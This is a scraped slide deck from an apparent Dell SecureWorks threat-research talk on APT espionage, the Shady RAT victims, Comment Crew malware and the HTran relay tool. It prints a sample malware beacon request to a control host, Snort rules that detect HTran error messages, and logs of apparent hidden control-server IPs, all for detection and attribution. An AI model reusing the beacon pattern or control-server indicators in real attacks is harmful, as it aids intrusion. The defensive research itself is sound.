200 likes | 916 Views
HTran and the Advanced Persistent Threat. Joe Stewart Director of Malware Research Dell SecureWorks. APT Definition. Cyber-espionage activity targeting government, industry or activists. APT Attack Targets. Government Military Defense Contractors Security Companies Software Vendors
E N D
HTran and the Advanced Persistent Threat Joe Stewart Director of Malware Research Dell SecureWorks Confidential
APT Definition Cyber-espionage activity targeting government, industry or activists. Confidential
APT Attack Targets • Government • Military • Defense Contractors • Security Companies • Software Vendors • Webmail Providers • Activist Orgs • Manufacturers • Global Policy Orgs • Think-Tanks Confidential
APT Attack Tools • Spear-Phishing • Zero-Day Exploits • Custom Backdoors • Low AV detection • Custom network protocols/encryption • Custom Toolsets • Network Discovery • SQL/SMB bruteforce • Remote administration Confidential
Dell SecureWorks APT Tracking Stats • 80+ Malware families • 8500+ C2 hostnames • 1300+ Domains • 55% Registered by APT actors • 35% Dynamic DNS names • 10% Compromised domains • 1500+ active IPs • 1000+ IPS countermeasures deployed Confidential
Shady RAT Confidential
Shady RAT Report Breakdown • McAfee found public log analysis pages on an APT control server • Processed logs only list IPs of 30 “top-talkers” per month • 666 unique IP addresses • McAfee identified 72 victims across a broad array of sectors: • Government • International • National • State • County • Military/Military contractors • Construction • Electronics • Computer Security • Communications • Energy • News Media • Agriculture • Trade Groups • CTU correlated McAfee’s report with the log data • Independently derived complete list of victim names • Determined Shady RAT to be part of activity by the “Comment Crew” Confidential
Shady RAT – CTU Analysis • Dell SecureWorks CTU identified 15 additional victims from Shady RAT logs: • U.S. Government commission • Three additional defense contractors • Air Force of Asian nation • Financial news service • Data backup company • Trade group • Global policy advocate • Scientific supply company • Satellite communications company • Biomedical institute • University • Healthcare benefits management firm • Seminary School Confidential
Comment Crew Malware • First stage - small downloader trojans • Designed to periodically request a web page with additional instructions (sleep, download second-stage payload) • Typical stage-1 phone-home request (User-Agent/URI path varies from variant to variant): GET /comp/sem/resources.htm HTTP/1.1 User-Agent: HTTP Mozilla/5.0(compatible+MSIE) Host: www.cometoway.org Cache-Control: no-cache Confidential
Comment Crew Response HTTP/1.1 200 OK Date: Fri, 06 May 2011 15:56:50 GMT Server: Apache Last-Modified: Sat, 26 Mar 2011 02:23:09 GMT ETag: "a301f7-19ed-49f596435dd40" Accept-Ranges: bytes Content-Length: 6637 Content-Type: text/html <!-- czoyNA== --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html> <head> <title>Advanced Insurance Management - Information and Resources for Workers' Comp</title> <style type="text/css"> Confidential
Shady RAT and the APT Landscape • Shady RAT is the tip of an iceberg • Same actor group (Comment Crew) has at least a dozen variants that behave similarly to Shady RAT • Many more second-stage backdoor trojans • Each trojan variant has several known control servers • CTU has tied over 100 different C2s to specific Comment Crew malware samples • Many more hostnames identified as belonging to Comment Crew domains but malware samples not yet found • Comment Crew is one of two major APT actor groups, with several minor actor groups also in play • Shady RAT data likely represents less than 1% of the actual APT activity going on in the world Confidential
HTran Confidential
HTran • During classification of APT malware used in RSA attack, interesting pattern identified in network traffic from APT C2 server: • Error message, although truncated, appeared to identify hidden backend destination of C2 traffic • Analysis of error message formatting led to source code for “HTran”, or “HUC Packet Transmit Tool” • HUC = Honker Union of China • HTran is a simple packet bouncer/relay, used to disguise the location of the real C2 server of any malware using TCP communication • In cases where connectivity is lost between HTran and the backend server, the connection error message will be sent to the connecting client [SERVER]connection to funn Confidential
HTran Analysis • Since HTran will in certain cases betray the true location of the hacker, knowing the error message pattern gives us two advantages: • Identification of latent APT activity on the network • Attribution of origin of APT activity • Snort rules to detect HTran on the wire: alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"HTran Connection Redirect Failure Message"; flow:established,from_server; dsize:<80; content:"|5b|SERVER|5d|connection|20|to|20|"; depth:22; reference:url,www.secureworks.com/research/threats/htran/; sid:1111111111;) alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"HTran Connection Redirect Failure Message (Unicode)"; flow:established,from_server; dsize:<160; content:"|5b00|S|00|E|00|R|00|V|00|E|00|R|005d00|c|00|o|00|n|00|n|00|e|00|c|00|t|00|i|00|o|00|n|002000|t|00|o|002000|"; depth:44; reference:url,www.secureworks.com/research/threats/htran/; sid:1111111112;) Confidential
HTran Attribution Project • Using the list of APT-related hostnames, we resolve all IPs and connect to each one every 10 minutes • Wait up to 30 seconds for any HTran error messages which might occur • This survey of APT IPs has yielded plenty of results: [Thu Jul 28 03:47:59 2011] : [SERVER]connection to 112.64.212.108:8000 error [Thu Jul 21 01:02:26 2011] : [SERVER]connection to 112.64.214.174:443 error [Wed Jul 27 01:50:47 2011] : [SERVER]connection to 58.247.246.171:443 error [Wed Jul 27 14:10:15 2011] : [SERVER]connection to 112.65.84.61:443 error [Thu Jul 28 02:40:02 2011] : [SERVER]connection to 58.247.242.225:443 error [Thu Jul 28 03:06:30 2011] : [SERVER]connection to 58.247.242.225:443 error [Thu Jul 28 09:38:22 2011] : [SERVER]connection to 58.247.244.177:443 error [Wed Jul 27 14:50:51 2011] : [SERVER]connection to 112.64.215.67:1443 error Confidential
HTran Attribution Project • The survey still continues to yield results: [Wed Sep 21 00:56:58 2011] : [SERVER]connection to 58.247.25.171:443 error [Wed Sep 21 03:28:39 2011] : [SERVER]connection to 58.247.25.171:80 error [Wed Sep 21 06:32:16 2011] : [SERVER]connection to 121.229.200.223:10009 err [Wed Sep 21 07:47:10 2011] : [SERVER]connection to 112.65.85.93:443 error [Wed Sep 21 09:00:02 2011] : [SERVER]connection to 112.64.213.222:80 error [Wed Sep 21 11:28:24 2011] : [SERVER]connection to 112.64.113.17:443 error [Thu Sep 22 01:27:48 2011] : [SERVER]connection to 58.247.26.203:80 error [Thu Sep 22 09:13:39 2011] : [SERVER]connection to 202.85.61.150:6654 error [Thu Sep 22 02:45:17 2011] : [SERVER]connection to 58.247.26.203:443 error [Fri Sep 23 00:36:35 2011] : [SERVER]connection to 58.247.247.169:443 error [Fri Sep 23 04:47:20 2011] : [SERVER]connection to 114.92.20.60:80 error [Fri Sep 23 05:57:29 2011] : [SERVER]connection to 114.92.20.60:443 error [Fri Sep 23 08:33:42 2011] : [SERVER]connection to 121.229.200.8:10009 error [Sat Sep 24 06:53:31 2011] : [SERVER]connection to 180.171.193.13:443 error [Sat Sep 24 18:10:15 2011] : [SERVER]connection to 114.92.28.19:80 error [Sat Sep 24 03:13:10 2011] : [SERVER]connection to 180.171.193.13:53 error [Mon Sep 26 01:40:50 2011] : [SERVER]connection to 58.247.24.252:443 error Confidential
HTran Attribution Project Findings • Almost all of the HTran errors point to the true C2 being located on just a few networks in mainland China • Most of the activity is centered around Beijing and Shanghai • The Comment Crew uses HTran (so does the other major APT actor group) • Comment Crew HTran-hidden C2s are always found pointing to the Shanghai area • This kind of attribution is one step beyond regular IP-based attribution, but… • It still is only the “where”, not the “who” • It is nearly impossible to show a trail of digital evidence to state-sponsored actors (through legal means) • But at this point, is there anyone left who doesn’t believe this is state-sponsored activity? Confidential
APT Exfiltration Defense-in-Depth • Strong FW egress policy • Force HTTP/FTP traffic through proxy • Force HTTPS traffic through SSL-terminating proxy • DNS log monitoring • IPS (only with APT-trojan-aware ruleset) • HTTP protocol anomaly detection • Network whitelisting • Process whitelisting Confidential
Q&A • Send any suspected APT malware samples you encounter to apt@counterthreatunit.com for classification • Thank you! Confidential